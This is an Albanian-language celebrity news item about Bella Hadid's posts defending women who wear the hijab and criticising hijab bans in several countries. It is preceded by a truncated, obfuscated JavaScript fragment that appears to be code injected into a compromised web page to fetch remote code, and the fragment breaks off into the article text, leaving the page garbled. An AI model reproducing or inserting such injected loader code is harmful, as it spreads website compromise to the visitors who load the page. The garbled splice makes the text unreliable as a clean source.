;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Bella Hadid reagon ashpër kundër atyre që kundërshtojnë hixhabin

By

Supermodelja palestinezo-holandeze Bella Hadid ka publikuar një seri postimesh që mbrojnë gratë dhe vajzat që mbajnë hixhabin, mes sulmeve dhe masave të qeverisë ndaj bartësve të mbulesës islame në mbarë botën.

Hadid u bëri thirrje qeverive të Francës, Indisë, Belgjikës dhe provincës kanadeze të Quebec – të cilat të gjitha po shqyrtojnë ose zbatojnë ndalimin e hixhabit në hapësirat publike – të tërhiqen nga politikat që janë “diskriminuese ndaj grave myslimane”.

“Nuk është detyra juaj t’u tregoni grave se çfarë duhet ose nuk duhet të veshin, veçanërisht kur ka të bëjë me besimin dhe sigurinë”, tha ajo.

Hadid gjithashtu dha mbështetjen e saj për Hoda al-Jamaa, një adoleshente muslimane në Zelandën e Re, e cila ishte viktimë e një krimi të dyshuar të urrejtjes në fillim të këtij muaji. /Prive.al

View this post on Instagram

A post shared by Bella 🦋 (@bellahadid)

Artikuj të ngjashëm